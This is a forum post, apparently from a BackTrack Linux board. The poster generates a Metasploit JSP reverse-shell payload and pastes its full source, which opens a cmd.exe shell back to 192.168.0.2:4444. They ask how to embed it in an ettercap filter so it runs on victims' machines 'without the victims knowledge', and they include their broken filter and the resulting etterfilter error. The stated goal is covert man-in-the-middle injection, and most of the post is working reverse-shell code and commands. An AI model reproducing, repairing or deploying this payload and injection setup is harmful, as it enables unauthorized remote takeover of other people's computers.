Javascript shell from Meterpreter - Putting it into a ettercap filter?

**SilvaRizla** · 12-12-2009, 08:19 PM

I found this over at Metasploit Unleashed,

Code:

relik@fortress:/pentest/exploits/framework3# ./msfpayload java/jsp_shell_reverse_tcp LHOST=10.10.1.132 LPORT=8080 R > shell.jsp && ./msfcli exploit/multi/handler payload=java/jsp_shell_reverse_tcp LHOST=10.10.1.132 LPORT=8080 E[*] Please wait while we load the module tree...[*] Started reverse handler on port 8080[*] Starting the payload handler...

It will create some java that when executed should give you a shell on a victim machine. I'm wondering if it is possible to copy the contents of the .jsp in to an ettercap filter so this can be remotely exectued without the victims knowledge.

I've never done a filter before, so don't really know where I am with this. I have the following .filter file

Code:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
	  # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
  
			<%@page import="java.lang.*"%>
			<%@page import="java.util.*"%>
			<%@page import="java.io.*"%>
			<%@page import="java.net.*"%>

			<%
				class StreamConnector extends Thread
				{
					InputStream is;
					OutputStream os;
					  
					StreamConnector( InputStream is, OutputStream os )
					{
						this.is = is;
						this.os = os;
					}
							  
					public void run()
					{
						BufferedReader in  = null;
						BufferedWriter out = null;
						try
						{
							in  = new BufferedReader( new InputStreamReader( this.is ) );
							out = new BufferedWriter( new OutputStreamWriter( this.os ) );
							char buffer[] = new char[8192];
							int length;
							while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
							{
								out.write( buffer, 0, length );
								out.flush();
							}
						} catch( Exception e ){}
						try
						{
							if( in != null )
								in.close();
							if( out != null )
								out.close();
						} catch( Exception e ){}
					}
				}

				try
				{
					Socket socket = new Socket( "192.168.0.2", 4444 );
					Process process = Runtime.getRuntime().exec( "cmd.exe" );
					( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
					( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
				} catch( Exception e ) {}
			%>
		

   msg("Script run should now have shell.\n");
}

and am trying to convert using: etterfilter jsshell.filter -o jsshell.ef

but I am getting this:

Code:

etterfilter NG-0.7.3 copyright 2001-2004 ALoR & NaGA


 12 protocol tables loaded:
        DECODED DATA udp tcp gre icmp ip arp wifi fddi tr eth

 11 constants loaded:
        VRRP OSPF GRE UDP TCP ICMP6 ICMP PPTP PPPoE IP ARP

 Parsing source file 'jsshell.filter'
[jsshell.filter:10]: syntax error, unexpected '<', expecting '}'

It looks ok to me, whats the problem?

BackTrack Linux - Penetration Testing Distribution

Thread: Javascript shell from Meterpreter - Putting it into a ettercap filter?

Thread Tools

Search Thread

Display

Javascript shell from Meterpreter - Putting it into a ettercap filter?

Posting Permissions